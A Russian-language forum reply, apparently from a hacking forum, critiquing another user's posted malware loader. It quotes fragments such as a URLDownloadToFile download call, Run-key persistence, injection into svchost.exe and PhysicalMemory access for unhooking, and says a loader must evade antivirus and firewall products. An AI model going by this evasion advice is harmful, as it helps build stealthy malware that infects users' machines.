понимаешь ли в чем дело.
Во-первых, у тебя как бы антивирусы молчат, но это если скачивать нормальный файл.
Потому траффик, который ты получишь через
URLDownloadToFile(NULL,FROM,TO,0,NULL);
палится IMONом нод.
Во-вторых, твой уникальнейший ключ реестра Current Version\Run, как и все подобные RunOnce и т.п. палятся anti-spyware аутпоста, глазами юзера да и кто знает чем ещё.
В третьих, неясно что значит строка
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,GetPro cessID("svchost.exe")),&func)) ;
и зачем там нужен if, если потом стоит ;
В четвертых, ZoneAlarm не даст тебе снять хуки sdt. Не даст загрузить драйвер или открыть секцию PHYSICAL MEMORY.
if(_NtOpenSection(&hPhyMem, SECTION_MAP_READ | SECTION_MAP_WRITE, &oAttr ) != STATUS_SUCCESS)
причем, как я понял, это у тебя просто выдрано откуда-то с 99 года сорца, и засунуто в .h файл.
В пятых, не понятно зачем тебе строки
LoadLibrary("KERNEL32_DLL"); //грузим либы
LoadLibrary("USER32_DLL");
да и вообще все остальные.
В шестых, нет никакого смысла в том что ты выложил. Лоадер он на то и лоадер. Что должен не палится. Должен непалевно скачивать файлы. Должен весить очень мало.
Должен не использовать всякие чужие нестабильные ring0-переходы через колгейт. И не должен, наконец, быть собраным из чужих кусков сорцом.
А вообще никаких претензий быть не может, просто тебе было скучно и нечего делать. Я это так понял.
Причем, ладно бы если ты это написал на осенблере.
Типа понтанулся бы)
Как снег когда то понтанулся, выложив bindshell-исходник)
А на c++ уже все остальные нубы умеют((
Этим народ не удивишь.